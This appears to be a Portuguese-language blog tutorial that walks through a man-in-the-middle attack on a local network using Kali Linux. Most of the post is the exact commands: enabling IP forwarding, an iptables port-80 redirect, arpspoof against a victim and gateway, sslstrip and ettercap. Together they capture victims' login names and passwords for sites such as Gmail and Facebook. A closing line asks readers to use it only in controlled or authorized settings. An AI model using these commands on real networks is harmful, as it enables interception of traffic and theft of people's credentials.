Para realizar este ataque usei como “homem do meio” uma máquina com Kali Linux, uma distribuição Linux específica para pentest.
Caso precise de ajuda para instalação e configuração dessa ferramenta pode ver aqui
Para o meu teste tenho o seguinte cenário, para que você possa fazer o teste basta adaptar ao seu cenário.
IP da Vítima: 192.168.2.12
IP do default gateway 192.168.2.2
Vamos lá!
Usando o Kali Linux abra 4 terminais e deixe eles logados como “root” usando o comando “sudo su”. OBS: Creio que isso facilita para quem talvez não tenha muita experiência com linux, caso tenha experiência use os terminais como achar melhor.
Em um dos terminais digite o seguinte comando:
echo 1 > /proc/sys/net/ipv4/ip_forward (habilita o redirecionamento de pacotes)
No segundo terminal digite o seguinte o seguinte
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 1000 (redireciona os pacotes da porta 80 para porta 1000 da máquina do atacante)
No terceiro terminal digite
arpspoof -i eth0 -t 192.168.2.12 192.168.2.2 (Lembre-se de adaptar de acordo com seu ambiente, esse comando vai “envenenar” a tabela arp da vítima fazendo com que ele mande todo trafego que ia para o gateway para o atacante)
No quarto terminal digite o seguinte:
sslstrip -l 1000 (vai ler todos os dados na porta 1000)
De volta no primeiro terminal digite o seguinte:
ettercap -Tq -i eth0 (Aqui é onde vamos ver o que queremos)
Após esse passo a “vítima” deve acessar algum site que seja necessário autenticação, gmail, hotmail, facebook, twitter, etc…
Se tudo foi feito corretamente você vai ter uma tela semelhante a essa.
Conforme pode se ver na imagem acima, marcado em vermelho, após a vítima fazer uma autenticação, será exibido o login e senha da pessoa.
Lembre-se que isso deve ser feito apenas em ambientes controlados ou com as devidas autorizações.
0 comentários:
Postar um comentário